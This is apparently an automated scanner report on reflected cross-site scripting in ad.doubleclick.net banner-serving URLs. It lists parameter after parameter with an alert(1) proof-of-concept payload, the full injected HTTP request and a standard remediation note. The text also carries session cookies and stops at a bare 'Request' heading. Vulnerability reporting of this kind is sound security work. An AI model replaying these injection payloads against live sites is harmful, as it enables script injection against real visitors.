GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=5111465a32f"-alert(1)-"8ab85cbf533&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 309db"-alert(1)-"fcea8914433 was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3309db"-alert(1)-"fcea8914433&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f4ee"-alert(1)-"dfc4896d193 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=107371f4ee"-alert(1)-"dfc4896d193&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec397"-alert(1)-"e0f06d702a was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41ec397"-alert(1)-"e0f06d702a&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] --> <!-- Copyright 2006 DoubleClick Inc., All rights reserved. --> <SCRIPT LANGUAGE="JavaScript"> <!-- function DCF ...[SNIP]... =&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41ec397"-alert(1)-"e0f06d702a&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=ex_R2612_go/elite-products/dm:_N5823.CBSi_63094146_240279859_41826606"); var wmode = "opaque"; var bg = "same as SWF ...[SNIP]...
The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eede8"-alert(1)-"9ee37b710c5 was submitted in the b parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5eede8"-alert(1)-"9ee37b710c5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5cf6"-alert(1)-"6ccb754644a was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815a5cf6"-alert(1)-"6ccb754644a&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8730c"-alert(1)-"de14f00ef84 was submitted in the count parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=8730c"-alert(1)-"de14f00ef84&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8647"-alert(1)-"d99c0032c42 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=e8647"-alert(1)-"d99c0032c42&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbff8"-alert(1)-"8ca9b69f0e1 was submitted in the e parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3bbff8"-alert(1)-"8ca9b69f0e1&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da5e2"-alert(1)-"c2597d5ca1f was submitted in the epartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=da5e2"-alert(1)-"c2597d5ca1f&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee62e"-alert(1)-"d9f92c1a223 was submitted in the event parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=ee62e"-alert(1)-"d9f92c1a223 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page ...[SNIP]... &pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=ee62e"-alert(1)-"d9f92c1a223http://www.hp.com/united-states/tradein/promo/laserjet3/index_ent.html?jumpid=ex_r2612_go/tradeinandsave/dm:_N5823.CNET_61697327_239466418_41243731"); var wmode = "opaque"; var bg = "same as SWF"; var ...[SNIP]...
The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 290ad"-alert(1)-"43420ec0b9d was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn290ad"-alert(1)-"43420ec0b9d&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd1b3"-alert(1)-"04e666efca9 was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_USfd1b3"-alert(1)-"04e666efca9&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51bd1"-alert(1)-"9b019ff65a6 was submitted in the nd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=3068651bd1"-alert(1)-"9b019ff65a6&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4762b"-alert(1)-"efa33560dba was submitted in the o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a4762b"-alert(1)-"efa33560dba&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 774ba"-alert(1)-"1c1e8698a2b was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
